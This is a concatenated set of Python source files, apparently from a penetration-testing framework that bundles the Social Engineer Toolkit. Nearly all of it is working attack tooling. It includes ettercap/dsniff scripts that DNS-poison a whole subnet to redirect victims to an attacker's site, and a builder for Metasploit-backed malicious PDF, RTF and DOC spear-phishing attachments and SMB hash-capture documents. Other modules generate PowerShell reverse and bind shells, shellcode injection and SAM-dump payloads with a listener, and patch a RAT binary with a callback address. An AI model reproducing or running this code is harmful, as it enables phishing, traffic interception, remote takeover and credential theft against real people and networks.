buf = self._rbuf
buf.seek(0, 2) # seek end
if size < 0:
# Read until EOF
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
try:
data = self._sock.recv(rbufsize)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = buf.tell()
if buf_len >= size:
# Already have size bytes in our buffer? Extract and return.
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
left = size - buf_len
# recv() will malloc the amount of memory given as its
# parameter even though it often returns much less data
# than that. The returned data string is short lived
# as we copy it into a StringIO and free it. This avoids
# fragmentation issues on many platforms.
try:
data = self._sock.recv(left)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid buffer data copies when:
# - We have no data in our buffer.
# AND
# - Our call to recv returned exactly the
# number of bytes we were asked to read.
return data
if n == left:
buf.write(data)
del data # explicit free
break
assert n <= left, "recv(%d) returned %d bytes" % (left, n)
buf.write(data)
buf_len += n
del data # explicit free
#assert buf_len == buf.tell()
return buf.getvalue()
def readline(self, size=-1):
buf = self._rbuf
buf.seek(0, 2) # seek end
if buf.tell() > 0:
# check if we already have it in our buffer
buf.seek(0)
bline = buf.readline(size)
if bline.endswith('\n') or len(bline) == size:
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return bline
del bline
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
buf.seek(0)
buffers = [buf.read()]
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
data = None
recv = self._sock.recv
while True:
try:
while data != "\n":
data = recv(1)
if not data:
break
buffers.append(data)
except error as e:
# The try..except to catch EINTR was moved outside the
# recv loop to avoid the per byte overhead.
if e.args[0] == EINTR:
continue
raise
break
return "".join(buffers)
buf.seek(0, 2) # seek end
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
try:
data = self._sock.recv(self._rbufsize)
except error as e:
if e.args[0] == EINTR:
continue
raise
if not data:
break
nl = data.find('\n')
if nl >= 0:
nl += 1
buf.write(data[:nl])
self._rbuf.write(data[nl:])
del data
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or \n or EOF seen, whichever comes first
buf.seek(0, 2) # seek end
buf_len = buf.tell()
if buf_len >= size:
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO() # reset _rbuf. we consume it via buf.
while True:
data = ""
try:
data = self._sock.recv(self._rbufsize)
except:
#if e.args[0] == EINTR:
# continue
#raise
pass
if not data:
break
left = size - buf_len
# did we just receive a newline?
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
# save the excess data to _rbuf
self._rbuf.write(data[nl:])
if buf_len:
buf.write(data[:nl])
break
else:
# Shortcut. Avoid data copy through buf when returning
# a substring of our first recv().
return data[:nl]
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid data copy through buf when
# returning exactly all of our first recv().
return data
if n >= left:
buf.write(data[:left])
self._rbuf.write(data[left:])
break
buf.write(data)
buf_len += n
#assert buf_len == buf.tell()
return buf.getvalue()
def readlines(self, sizehint=0):
total = 0
list = []
while True:
line = self.readline()
if not line:
break
list.append(line)
total += len(line)
if sizehint and total >= sizehint:
break
return list
# Iterator protocols
def __iter__(self):
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
_GLOBAL_DEFAULT_TIMEOUT = object()
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
"""
host, port = address
err = None
for res in getaddrinfo(host, port, 0, SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except error as _:
err = _
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise error("getaddrinfo returns an empty list")
| 20,536 | Python | .py | 506 | 29.648221 | 84 | 0.560693 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,850 | arp.py | CHEGEBB_africana-framework/externals/set/src/core/arp_cache/arp.py | import subprocess
import re
import pexpect
import os
import time
import sys
from src.core.setcore import *
# Define to use ettercap or dsniff or nothing.
#
# Thanks to sami8007 and trcx for the dsniff addition
definepath = os.getcwd()
# grab config file
config = open("/etc/setoolkit/set.config", "r").readlines()
# grab our default directory
cwd = os.getcwd()
# set a variable as default to n or no
ettercapchoice = 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1 = re.search("ETTERCAP=ON", line)
if match1:
print_info("ARP Cache Poisoning is set to " +
bcolors.GREEN + "ON" + bcolors.ENDC)
ettercapchoice = 'y'
# check for dsniff choice here
match2 = re.search("DSNIFF=ON", line)
if match2:
print_info("DSNIFF DNS Poisoning is set to " +
bcolors.GREEN + "ON" + bcolors.ENDC)
dsniffchoice = 'y'
ettercapchoice = 'n'
# GRAB CONFIG from SET
fileopen = open("/etc/setoolkit/set.config", "r").readlines()
for line in fileopen:
# grab the ettercap interface
match = re.search("ETTERCAP_INTERFACE=", line)
if match:
line = line.rstrip()
interface = line.split("=")
interface = interface[1]
if interface == "NONE":
interface = ""
# grab the ettercap path
etterpath = re.search("ETTERCAP_PATH=", line)
if etterpath:
line = line.rstrip()
path = line.replace("ETTERCAP_PATH=", "")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
# if we are using ettercap then get everything ready
if ettercapchoice == 'y':
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
if ettercapchoice == 'y':
try:
print("""
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
""")
print_info("Example: http://www.google.com")
dns_spoof = raw_input(
setprompt("0", "Site to redirect to attack machine [*]"))
os.chdir(path)
# small fix for default
if dns_spoof == "":
# set default to * (everything)
dns_spoof = "*"
# remove old stale files
subprocess.Popen(
"rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
# prep etter.dns for writing
filewrite = open("etter.dns", "w")
# send our information to etter.dns
filewrite.write("%s A %s" % (dns_spoof, ipaddr))
# close the file
filewrite.close()
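        # e.g. with the defaults this writes "* A 192.168.1.5" (placeholder attacker IP),
        # which tells ettercap's dns_spoof plugin to answer every DNS lookup with our address.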
# set bridge variable to nothing
bridge = ""
# assign -M arp to arp variable
arp = "-M arp"
print_error("LAUNCHING ETTERCAP DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
time.sleep(5)
filewrite = open(userconfigpath + "ettercap", "w")
filewrite.write(
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
filewrite.close()
os.chdir(cwd)
except Exception as error:
os.chdir(cwd)
# log(error)
print_error("ERROR:An error has occured:")
print("ERROR:" + str(error))
# if we are using dsniff
if dsniffchoice == 'y':
# grab ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setprompt("0", "IP address to connect back on: "))
update_options("IPADDR=" + ipaddr)
if dsniffchoice == 'y':
try:
print("""
This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and every site by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
""")
print_info("Example: http://www.google.com")
dns_spoof = raw_input(
setprompt("0", "Site to redirect to attack machine [*]"))
# os.chdir(path)
# small fix for default
if dns_spoof == "":
dns_spoof = "*"
subprocess.Popen(
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
filewrite = open(userconfigpath + "dnsspoof.conf", "w")
filewrite.write("%s %s" % (ipaddr, dns_spoof))
filewrite.close()
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
# time.sleep(5)
# grab default gateway, should eventually replace with pynetinfo
# python module
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
# open file for writing
filewrite = open(userconfigpath + "ettercap", "w")
# write the arpspoof / dnsspoof commands to file
filewrite.write(
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
# close the file
filewrite.close()
# change back to normal directory
os.chdir(cwd)
# this is needed to keep it similar to format above for web gui
# mode
pause = raw_input("Press <return> to begin dsniff.")
except Exception as error:
os.chdir(cwd)
print_error("ERROR:An error has occurred:")
print(bcolors.RED + "ERROR" + str(error) + bcolors.ENDC)
| 6,690 | Python | .py | 162 | 32.537037 | 102 | 0.603562 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,851 | msf_list.py | CHEGEBB_africana-framework/externals/set/src/core/msf_attacks/msf_list.py | #!/usr/bin/env python3
import re
import subprocess
import sys
import src
from src.core import module_reload
from src.core.setcore import debug_msg, meta_path, mod_name
me = mod_name()
sys.path.append("src/core")
debug_msg(me, "re-importing 'src.core.setcore'", 1)
try:
module_reload(src.core.setcore)
except:
import src.core.setcore
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
generate_list = subprocess.Popen(
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print("[---] Database is now up-to-date [---]")
| 620 | Python | .py | 18 | 32.666667 | 112 | 0.738333 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,852 | create_payload.py | CHEGEBB_africana-framework/externals/set/src/core/msf_attacks/create_payload.py | #!/usr/bin/python3
# PDF spear phishing attack here
import subprocess
import re
import sys
import os
import socket
import pexpect
import time
from src.core.setcore import *
from src.core.dictionaries import *
from src.core.menu.text import *
me = mod_name()
definepath = os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
outfile = ("template.pdf")
# metasploit path
meta_path = meta_path()
print(meta_path)
# define if we need apache or not for dll hijacking
# define if use apache or not
apache = 0
# open set_config
apache_check = open("/etc/setoolkit/set.config", "r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line = line.rstrip()
# if apache is turned on get things ready
match = re.search("APACHE_SERVER=ON", line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2 = re.search("APACHE_DIRECTORY=", line2)
if match2:
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
inputpdf = ""
target = ""
exploit = "INVALID"
while exploit == "INVALID":
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
show_payload_menu1 = create_menu(
create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], ""))
print("\n")
# Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and
# converting the user returned value to the metasploit string
# here we specify if its a pdf or rtf
if exploit == 'exit':
exit_set()
if exploit == "":
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
exploit = '1'
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile = ("template.doc")
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4':
outfile = ("template.rtf")
target = ("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit != "17":
outfile = ("template.pdf")
debug_msg(me, 'current input was read as: %s' % exploit, 3)
exploit = ms_attacks(exploit)
debug_msg(me, 'value was translated to: %s' % exploit, 3)
if exploit == "INVALID":
print_warning(
"that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info(
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print("""
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n""")
choicepdf = raw_input(setprompt(["4"], ""))
if choicepdf == 'exit': exit_set()
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf = raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
choicepdf = inputpdf
# if blank, then default to normal pdf
if inputpdf == "":
# change to default SET pdf
print_info("Defaulting to BLANK PDF built into SET...")
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
choicepdf = inputpdf
        # if the file does not exist, default to the built-in PDF
if not os.path.isfile(inputpdf):
print_warning("Unable to find PDF, defaulting to blank PDF.")
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
choicepdf = inputpdf
if choicepdf == '2':
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
if choicepdf == "":
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
exploit_counter = 0
if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter = 1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
debug_msg(me, "printing 'src.core.menu.text.payload_menu_3'", 5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload = raw_input(setprompt(["4"], ""))
noencode = 0
if payload == 'exit':
exit_set()
if payload == "":
payload = "2"
if payload == '4' or payload == '5' or payload == '6':
noencode = 1
payload = ms_payload_3(payload)
# imported from central, grabs ip address
rhost = grab_ipaddress()
# SET LPORT
lport = raw_input(setprompt(["4"], "Port to connect back on [443]"))
# if blank default to 443
if lport == "":
lport = "443"
print_info("Defaulting to port 443...")
# SET FILE OUTPATH
# /root/.msf4/local/msf.pdf
filename_code = outfile
msfpath = ""
if os.path.isdir(users_home + "/.msf4/"):
msfpath = (users_home + "/.msf4/")
if os.path.isdir(users_home + "/.msf5/"):
# then we know its actually created
if os.path.isdir(users_home + "/.msf5/loot"):
msfpath = (users_home + "/.msf5/")
# if we have never run msf before
if msfpath == "":
print_warning("Metasploit has not been previously run on the system. This means that the msf directories haven't been created yet. Running Metasploit for you.")
child = pexpect.spawn("msfconsole")
print_status("Waiting 10 seconds for the directories to be created...")
time.sleep(10)
child.close()
if os.path.isdir(users_home + "/.msf4"):
print_status("All good! The directories were created.")
msfpath = (users_home + "/.msf4/")
else:
print_error("Please exit out of SET and type 'msfconsole' from the command prompt and launch SET again. Can't find the msf4 directory.")
sys.exit()
outpath = (msfpath + "local/" + outfile)
print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
output = userconfigpath + "%s" % (outfile)
if os.path.isfile(userconfigpath + "template.pdf"):
os.remove(userconfigpath + "template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf")
if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n")
output = output.replace("//", "/")
filewrite = open(userconfigpath + "template.rc", "w")
filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" %
(exploit, rhost, lport, inputpdf, output))
filewrite.close()
child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, userconfigpath))
a = 1
counter = 0
while a == 1:
if counter == 10:
a = 2
print_error("Unable to generate PDF - there appears to be an issue with your Metasploit install.")
print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.")
pause = raw_input("Press {return} to move back.")
break
if os.path.isfile(userconfigpath + "" + outfile):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, userconfigpath),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break
else:
print_status("Waiting for payload generation to complete (be patient, takes a bit)...")
if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, userconfigpath), shell=True)
counter = counter + 1
time.sleep(3)
print_status("Payload creation complete.")
time.sleep(1)
print_status("All payloads get sent to the %s directory" % (outfile))
if exploit == 'custom/exe/to/vba/payload':
# Creating Payload here
# if not 64 specify raw output and filename of vb1.exe
if noencode == 0:
execute1 = ("raw")
payloadname = ("vb1.exe")
if noencode == 1:
execute1 = ("exe")
payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, userconfigpath, payloadname), shell=True)
if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, userconfigpath, userconfigpath), shell=True)
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, userconfigpath, userconfigpath), shell=True)
print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(userconfigpath, userconfigpath), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = open(userconfigpath + "payload.options", "w")
filewrite.write(payload + " " + rhost + " " + lport)
filewrite.close()
if exploit != "dll_hijacking":
if not os.path.isfile(userconfigpath + "fileformat.file"):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
# start the unc_embed attack stuff here
if exploit == "unc_embed":
    rhost = grab_ipaddress()
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
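    # Hedged usage note (editor's addition, not part of the original module):
    # random_string() simply returns a mixed-case alphanumeric name of 6-15
    # characters (e.g. something like "k3RzqPtw"); it is only used below to
    # pick a non-obvious filename.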
rand_gen = random_string()
filewrite = open(userconfigpath + "unc_config", "w")
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
filewrite = open(userconfigpath + "template.doc", "w")
filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close()
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
# start the dll_hijacking stuff here
if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
module_reload(create_payloads)
except:
import create_payloads
sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
try:
module_reload(hijacking)
except:
import hijacking
# if we are not using apache
if apache == 0:
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hijacking")
filewrite.close()
filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python3 src/html/web_server.py")
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait()
if os.path.isfile(userconfigpath + "meta_config"):
# if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
print_info("This may take a few to load MSF...")
try:
child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, userconfigpath))
except:
try:
child1.close()
except:
pass
# get the emails out
# if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
module_reload(smtp_client)
except:
import smtp_client
try:
child1.interact()
except:
if apache == 0:
try:
child.close()
child1.close()
except:
pass
| 13,929 | Python | .py | 315 | 35.825397 | 217 | 0.603052 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,853 | powershell.py | CHEGEBB_africana-framework/externals/set/src/powershell/powershell.py | #!/usr/bin/python3
# coding=utf-8
#
#
# handle powershell payloads and get them ready
#
#
#
import os
import shutil
import subprocess
import src
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5)
show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = input(core.setprompt(["29"], ""))
if powershell_menu_choice != "0":
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
ipaddr = input("Enter the IPAddress or DNS name for the reverse host: ")
core.update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT=" + port)
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(core.userconfigpath + "payload_options.shellcode", "w") as filewrite:
filewrite.write("windows/meterpreter/reverse_https {},".format(port))
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
#prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
# here we format everything for us
with open(core.userconfigpath + "x86.powershell") as fileopen:
x86 = fileopen.read()
x86 = core.powershell_encodedcommand(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
with open(core.userconfigpath + "reports/powershell/x86_powershell_injection.txt", "w") as filewrite:
filewrite.write(x86)
choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"
"exploit -j".format(port))
msf_path = core.meta_path()
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait()
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if not port:
port = "443"
# open the reverse shell up
core.print_status("Rewriting the powershell reverse shell with options")
with open("src/powershell/reverse.powershell") as fileopen:
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
core.print_status("Exporting the powershell stuff to {0}".format(os.path.join(core.userconfigpath, "reports/powershell")))
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.userconfigpath + "reports/powershell/powershell.reverse.txt", "w") as filewrite:
filewrite.write(data)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]")
if choice == "NO":
core.print_status("Have netcat or standard socket listener on port {0}".format(port))
if choice == "YES":
core.socket_listener(port)
core.return_continue()
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
# open file
with open("src/powershell/bind.powershell") as fileopen:
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
with open(core.userconfigpath + "reports/powershell/powershell.bind.txt", "w") as filewrite:
filewrite.write(data)
core.print_status("The powershell program has been exported to {0}".format(os.path.join(core.userconfigpath, "reports/powershell/")))
core.return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir(core.userconfigpath + "reports/powershell"):
os.makedirs(core.userconfigpath + "reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", core.userconfigpath + "reports/powershell/powerdump.encoded.txt")
core.print_status("The powershell program has been exported to {}".format(os.path.join(core.userconfigpath, "reports/powershell")))
core.print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
core.return_continue()
| 6,325 | Python | .py | 121 | 42.694215 | 166 | 0.646926 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,854 | ratte_only_module.py | CHEGEBB_africana-framework/externals/set/modules/ratte_only_module.py | #! /usr/bin/python3
#
# These are required fields
#
import os
import subprocess
from time import sleep
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# "This is RATTE (Remote Administration Tool Tommy Edition) prepare module.It will prepare a custom ratteM.exe."
MAIN="RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first"
AUTHOR="Thomas Werth"
#
# Start ratteserver
#
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % port, shell=True).wait()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
# Load content of RATTE
############
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
############
# PATCH Server IP into RATTE
############
with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
        # check that customexe is non-empty, otherwise an empty field would be patched (which is wrong)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
